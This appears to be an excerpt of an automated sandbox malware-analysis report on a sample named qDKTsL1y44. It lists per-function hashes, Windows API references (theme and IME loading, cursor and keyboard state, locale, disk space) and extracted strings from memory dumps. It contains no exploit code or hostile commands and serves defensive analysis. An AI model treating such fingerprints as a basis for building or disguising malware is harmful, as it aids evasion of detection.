Opcode ID: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
Instruction ID: 3c23d9e2dfb25bd1a898700b818da1d677a065931936196ac356c6f5f964f18f
Opcode Fuzzy Hash: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
Instruction Fuzzy Hash: 3523F270B20205AFEB31EF64CC84BBE77B5AF85704F048458E949672A0DBB4B984DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0423245C Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 04232468
GetCursorPos.USER32(?), ref: 04232485
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 042324A5

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: c6e9ed8daa6d604e6c51445ec91ad4f0070d7930f4a8aa56f4d42c32e5e812fa
Instruction ID: 06966e33c4ebf228b819771221898b03c93bcc6c4e43faafe89986ad5a7be197
Opcode Fuzzy Hash: c6e9ed8daa6d604e6c51445ec91ad4f0070d7930f4a8aa56f4d42c32e5e812fa
Instruction Fuzzy Hash: 14F082B1724209DBFB24FB59E8C9B9D73F8EB10316F8001E29210971D1EB79B484C625

Uniqueness

Uniqueness Score: -1.00%

Function 0425906B Relevance: 4.2, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

(, xrefs: 0425940F
(((, xrefs: 0425942E
(, xrefs: 042593FE

Memory Dump Source

Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID: ($($(((
API String ID: 0-2102698497
Opcode ID: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
Instruction ID: 5565d9faf48656dd6a3eced264bc32a67cbc5486af150f677ad37fb6329dc71e
Opcode Fuzzy Hash: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
Instruction Fuzzy Hash: 40E10670B24115EFEB08EE29CC80B7E77A6DFC5314F14C229E816E72D5DA70A981C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0425AACF Relevance: 3.5, Strings: 2, Instructions: 1000COMMON

Download Yara Rule

Strings

, xrefs: 0425B47A
@, xrefs: 0425B892

Memory Dump Source

Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
Instruction ID: 510e9e268c95c29e1ed578f6479b065561658adf982de2fc89be277d0ceb4caa
Opcode Fuzzy Hash: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
Instruction Fuzzy Hash: 0E724970730706AAFB22BF64CD8AFBE3A95AF45304F044165FD42A90F1DBB47581C669

Uniqueness

Uniqueness Score: -1.00%

Function 0421F140 Relevance: 3.1, APIs: 2, Instructions: 97windowCOMMON

Download Yara Rule

APIs

GetMessagePos.USER32 ref: 0421F14F
GetKeyboardState.USER32(?,?,?,?,0421F6C4), ref: 0421F24C

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: KeyboardMessageState
String ID:
API String ID: 3083355189-0
Opcode ID: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
Instruction ID: 61acc93d7e581fffb6bb9e2a7182e9c789187530384cc171bcee382e30531b8f
Opcode Fuzzy Hash: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
Instruction Fuzzy Hash: B631C2793287418BD324DF78C68579FBBD4ABA9314F014A2DE5A8C7260EB74E900C757

Uniqueness

Uniqueness Score: -1.00%

Function 04221018 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 04221050
GetCapture.USER32 ref: 04221059

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: b7445c870a877997434ffc451937a7817cd57395b676cf6db817ad6b0d65889b
Instruction ID: 53618bf0d19f1846d2f5ee89a70184816d026ef3557436fb366a8fde9d67cf07
Opcode Fuzzy Hash: b7445c870a877997434ffc451937a7817cd57395b676cf6db817ad6b0d65889b
Instruction Fuzzy Hash: F9116035B10226AFAB20DF68C694E7AB3E5AF04704F244474E804DF355D772FE509B40

Uniqueness

Uniqueness Score: -1.00%

Function 04203458 Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,042034F4), ref: 04203478
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,042034F4), ref: 0420349E

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 47684520dd4d93864044527a9426ce646fc943971009a72767d4e06eeb5fa5e5
Instruction ID: 6b2942001231ccd71fefb7f27a6e803bdc8ba5d0c3f666591456b0849b3790d4
Opcode Fuzzy Hash: 47684520dd4d93864044527a9426ce646fc943971009a72767d4e06eeb5fa5e5
Instruction Fuzzy Hash: 6F01A7747146155FF722EBA1CCC1BE9B3E8EB58704F8280A0EE44E62C1EBF47D808914

Uniqueness

Uniqueness Score: -1.00%

Function 041E8F58 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 041E8F79

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
Instruction ID: 69e546395c780140dabec79f78ed848fdbc188eee96c2d07416c15225a006ec4
Opcode Fuzzy Hash: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
Instruction Fuzzy Hash: 9C1100B5A00609AF9B00CF99C8809AFB7F9EFCC314B54C559A404E7250E631AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 041EB8C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
Instruction ID: c8894e4077c020e572b9887425d581f630de41d81180cb3f501b5a1d62ec1d55
Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
Instruction Fuzzy Hash: 02E0D876B0461817E714E5AA8CC4EF6725C9758310F40026AFA48C7345EFA0BD9043E8

Uniqueness

Uniqueness Score: -1.00%

Function 041EB910 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,041ED07E,00000000,041ED297,?,?,00000000,00000000), ref: 041EB923

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
Instruction ID: afb023c6317ffe6e511235461e34e1f4fc0fab0138dc02bad115b6d5fc7d9fb4
Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
Instruction Fuzzy Hash: 37D05EAA30E6603AB214915B2DC4E7B5ADCCAC56A5F41407AB688C6202D300AC069671

Uniqueness

Uniqueness Score: -1.00%

Function 041EA30C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 041EA310

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
Instruction ID: 187febae984e24e9f355d15c2f694edcdd69b106221c60f656e13a4b55416d42
Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
Instruction Fuzzy Hash: D1A01204404C2041954033194C0213430C05810A20FC4074068F8442D0EA1D11208097

Uniqueness

Uniqueness Score: -1.00%

Function 0426BA28 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

F, xrefs: 0426BAC4

Memory Dump Source

Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction ID: f4bef169c7c86ed80806e696eeae7f21b8d6663f42c755284999afcb41c234bb
Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
Instruction Fuzzy Hash: 60518A71F106198BEB18CE5DC8907AEBAE7EBC8314F54813DD90AE7384EA747E418744

Uniqueness

Uniqueness Score: -1.00%

Function 0425A1DD Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
Instruction ID: ade08fe6fed8cec49215598d7efacd6042736f85a44b27b15140cb2acf1912ea
Opcode Fuzzy Hash: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
Instruction Fuzzy Hash: FFF1A371F20219AFEF04AFA9CC45BEEBFBAEF84344F148114F942B7191DA7469518B60

Uniqueness

Uniqueness Score: -1.00%

Function 0424EFBB Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction ID: 9687695092711c5ffd2514d37f3791b16408a9d04f3e4bb04122769495a601ee
Opcode Fuzzy Hash: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
Instruction Fuzzy Hash: 00D13935B247466BEB19CFA8DD807ADBBF5EFC9304F1480B9E44993241EB74AA50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04258D18 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
Instruction ID: d90c658bde94092cd9bd1365ad78f14d3ba15163fb2101e2be90f11773ea796f
Opcode Fuzzy Hash: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
Instruction Fuzzy Hash: 27A1F331B20115AFEB04FE6ACC44BBEB7A7DFC4314F14C124E816EB295DBB4A951CA64

Uniqueness

Uniqueness Score: -1.00%

Function 041E2160 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 0420B744 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0420BAF7), ref: 0420B77A
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0420B792
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0420B7A4
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0420B7B6
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0420B7C8
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0420B7DA
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0420B7EC
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0420B7FE
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0420B810
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0420B822
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0420B834
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0420B846
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0420B858
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0420B86A
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0420B87C
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0420B88E
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0420B8A0
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0420B8B2
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0420B8C4
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0420B8D6
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0420B8E8
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0420B8FA
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0420B90C
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0420B91E
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0420B930
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0420B942
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0420B954
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0420B966
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0420B978
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0420B98A
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0420B99C
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0420B9AE
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0420B9C0
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0420B9D2
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0420B9E4
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0420B9F6
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0420BA08
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0420BA1A
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0420BA2C
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0420BA3E
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0420BA50
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0420BA62
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0420BA74
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0420BA86
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0420BA98
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0420BAAA
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0420BABC
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0420BACE

Strings

GetThemeTextMetrics, xrefs: 0420B81A
GetThemeRect, xrefs: 0420B928
GetThemeSysColor, xrefs: 0420B994
GetThemePartSize, xrefs: 0420B7F6
EnableTheming, xrefs: 0420BAC6
GetThemeAppProperties, xrefs: 0420BA6C
DrawThemeParentBackground, xrefs: 0420BAB4
GetThemeMargins, xrefs: 0420B93A
GetThemeSysInt, xrefs: 0420BA00
IsThemePartDefined, xrefs: 0420B874
GetThemeFont, xrefs: 0420B916
GetThemePosition, xrefs: 0420B904
GetThemeInt, xrefs: 0420B8E0
GetThemeIntList, xrefs: 0420B94C
CloseThemeData, xrefs: 0420B79C
IsThemeDialogTextureEnabled, xrefs: 0420BA5A
GetThemeFilename, xrefs: 0420B982
GetThemeBool, xrefs: 0420B8CE
GetThemeTextExtent, xrefs: 0420B808
GetThemeDocumentationProperty, xrefs: 0420BAA2
GetThemeSysColorBrush, xrefs: 0420B9A6
SetThemeAppProperties, xrefs: 0420BA7E
GetThemeBackgroundContentRect, xrefs: 0420B7D2, 0420B7E4
GetThemeSysString, xrefs: 0420B9EE
OpenThemeData, xrefs: 0420B78A
GetThemeBackgroundRegion, xrefs: 0420B82C
DrawThemeEdge, xrefs: 0420B850
GetThemeMetric, xrefs: 0420B8AA
DrawThemeText, xrefs: 0420B7C0
EnableThemeDialogTexture, xrefs: 0420BA48
GetThemeEnumValue, xrefs: 0420B8F2
IsThemeActive, xrefs: 0420BA12
GetThemeSysFont, xrefs: 0420B9DC
DrawThemeIcon, xrefs: 0420B862
GetThemePropertyOrigin, xrefs: 0420B95E
IsAppThemed, xrefs: 0420BA24
GetWindowTheme, xrefs: 0420BA36
IsThemeBackgroundPartiallyTransparent, xrefs: 0420B886
GetThemeString, xrefs: 0420B8BC
SetWindowTheme, xrefs: 0420B970
uxtheme.dll, xrefs: 0420B775
GetThemeSysBool, xrefs: 0420B9B8
GetCurrentThemeName, xrefs: 0420BA90
GetThemeColor, xrefs: 0420B898
GetThemeSysSize, xrefs: 0420B9CA
DrawThemeBackground, xrefs: 0420B7AE
HitTestThemeBackground, xrefs: 0420B83E

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: a6e11bf8ff30e7f9150e291e2ff889243d9c6af78fdccc7131d29904b86761bf
Instruction ID: 5ceae4b9a0227950ed056032aef1fca39b736c55f8144fdd2d0c403cdb808aa0
Opcode Fuzzy Hash: a6e11bf8ff30e7f9150e291e2ff889243d9c6af78fdccc7131d29904b86761bf
Instruction Fuzzy Hash: 62A101B4B50A50AFEF10EFB9E8C9E6A3BE8EB1A7543804565A424CF245D778BC04CF15

Uniqueness

Uniqueness Score: -1.00%

Function 04227028 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 04227041
GetModuleHandleA.KERNEL32(USER32,00000000,0422718E,?,00008000), ref: 04227065
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04227072
LoadLibraryA.KERNEL32(imm32.dll,00000000,0422718E,?,00008000), ref: 0422708E
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 042270B0
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 042270C5
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 042270DA
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 042270EF
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04227104
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04227119
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0422712E
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04227143
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04227158
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0422716D
SetErrorMode.KERNEL32(?,04227195,00008000), ref: 04227188

Strings

ImmReleaseContext, xrefs: 042270BA
ImmGetContext, xrefs: 042270A5
WINNLSEnableIME, xrefs: 0422706C
ImmSetCompositionFontA, xrefs: 04227123
imm32.dll, xrefs: 04227089
ImmSetOpenStatus, xrefs: 042270F9
ImmSetCompositionWindow, xrefs: 0422710E
ImmSetConversionStatus, xrefs: 042270E4
USER32, xrefs: 04227060
ImmGetConversionStatus, xrefs: 042270CF
ImmGetCompositionStringA, xrefs: 04227138
ImmIsIME, xrefs: 0422714D
ImmNotifyIME, xrefs: 04227162

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
